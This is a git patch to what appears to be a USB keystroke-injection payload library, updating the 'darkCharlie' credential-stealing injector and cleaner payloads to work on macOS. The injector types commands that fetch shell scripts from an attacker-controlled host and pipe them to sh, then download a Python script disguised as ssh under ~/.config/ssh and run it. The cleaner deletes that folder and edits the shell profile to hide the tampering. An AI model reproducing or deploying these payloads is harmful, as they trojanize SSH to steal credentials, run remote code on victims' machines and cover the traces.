From 31468c0e63d8a313710e92efbc273cd23c5a017a Mon Sep 17 00:00:00 2001 From: Michael Weinstein Date: Sun, 24 Sep 2017 02:11:45 -0700 Subject: [PATCH] mac attack Got mac attacks working now. SEDing in place on a mac seems like something that really makes the terminal unhappy. Did the same thing with a python one-shot command. --- .../credentials/darkCharlie/cleaner/payload.txt | 16 ++++++++++++---- .../credentials/darkCharlie/injector/payload.txt | 16 +++++++++++----- 2 files changed, 23 insertions(+), 9 deletions(-) diff --git a/payloads/library/credentials/darkCharlie/cleaner/payload.txt b/payloads/library/credentials/darkCharlie/cleaner/payload.txt index f78eca67..11dfa7c0 100644 --- a/payloads/library/credentials/darkCharlie/cleaner/payload.txt +++ b/payloads/library/credentials/darkCharlie/cleaner/payload.txt @@ -53,14 +53,22 @@ QUACK ENTER QUACK DELAY 500 if [ "$mac" = true ] then - QUACK STRING rm -rf \~/.config/ssh \&\& sed -i \'/export PATH=\\~\\/.config\\/ssh:/d\' \~/.bash_profile + QUACK STRING rm -rf \~/.config/ssh #\&\& sed -i \'/export PATH=\\~\\/.config\\/ssh:/d\' \~/.bash_profile #macs really seem to hate it when you sed in place, I think. + QUACK ENTER + QUACK STRING "python -c \"import os; home = os.environ['HOME']; file = open(home + '/.bash_profile','r'); dataIn = file.readlines(); file.close(); dataOut = [line for line in dataIn if not '~/.config/ssh' in line]; output = ''.join(dataOut); file = open(home + '/.bash_profile','w'); file.write(output); file.close()\"" else QUACK STRING rm -rf \~/.config/ssh \&\& sed -i \'/export PATH=\\~\\/.config\\/ssh:/d\' \~/.bashrc fi QUACK ENTER QUACK DELAY 200 -QUACK STRING exit -QUACK DELAY 200 -QUACK ENTER +if [ "$mac" = true ] +then + QUACK DELAY 2000 + QUACK GUI w +else + QUACK STRING exit + QUACK DELAY 200 + QUACK ENTER +fi LED SUCCESS #See you, space cowboy... \ No newline at end of file diff --git a/payloads/library/credentials/darkCharlie/injector/payload.txt b/payloads/library/credentials/darkCharlie/injector/payload.txt index ec03ae26..5f87625a 100644 --- a/payloads/library/credentials/darkCharlie/injector/payload.txt +++ b/payloads/library/credentials/darkCharlie/injector/payload.txt @@ -62,13 +62,13 @@ then QUACK STRING curl "http://$HOST_IP/pre.sh" \| sh QUACK ENTER QUACK DELAY 200 - QUACK STRING curl "http://$HOST_IP/darkCharlie.py" \> ~/.config/ssh/ssh + QUACK STRING curl "http://$HOST_IP/darkCharlie.py" \> "~/.config/ssh/ssh" QUACK ENTER QUACK DELAY 200 QUACK STRING curl "http://$HOST_IP/post.sh" \| sh QUACK ENTER QUACK DELAY 200 - QUACK STRING ~/.config/ssh/ssh --initializeScript + QUACK STRING python "~/.config/ssh/ssh" --initializeScript QUACK ENTER QUACK DELAY 200 else @@ -89,7 +89,13 @@ fi QUACK DELAY 200 QUACK ENTER QUACK DELAY 200 -QUACK STRING exit -QUACK DELAY 200 -QUACK ENTER +if [ "$mac" = true ] +then + QUACK DELAY 5000 #seems like macs need some extra time on this + QUACK GUI w +else + QUACK STRING exit + QUACK DELAY 200 + QUACK ENTER +fi LED SUCCESS #The Dungeons and Dragons tattoo hath rolled a 20